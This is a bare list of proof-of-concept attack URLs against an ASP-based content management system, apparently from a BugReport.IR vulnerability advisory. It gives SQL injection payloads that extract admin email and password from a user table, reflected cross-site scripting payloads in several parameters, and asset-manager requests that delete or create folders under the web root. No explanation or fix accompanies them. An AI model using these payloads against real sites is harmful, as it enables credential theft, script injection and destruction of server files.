http://www.example.com/ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25' http://www.example.com/ansFAQ.asp?id=1&topic=</title><script>alert('sdl BugReport.IR XSS')</script> http://www.example.com/ansFAQ.asp?id=1&button="><script>alert('sdl BugReport.IR XSS')</script> http://www.example.com/preview.asp?template_id=-1 union select 1,'[%25menu%25]' as date_created,email%2b'<br>'%2bpassword,user.*,user.*,1,2,3,4,5 from [user] where email like '%25admin%25' http://www.example.com/cms/assetmanager/folderdel_.asp?inpCurrFolder=C:\InetPub\wwwroot\ http://www.example.com/cms/assetmanager/foldernew.asp?inpCurrFolder=c:\inetpub\wwwroot\&inpNewFolderName=test2008 http://www.example.com/login.asp?id=1"><script>alert('sdl BugReport.ir XSS')</script> http://www.example.com/login.asp?txtEmail=1"><script>alert('sdl BugReport.ir XSS')</script>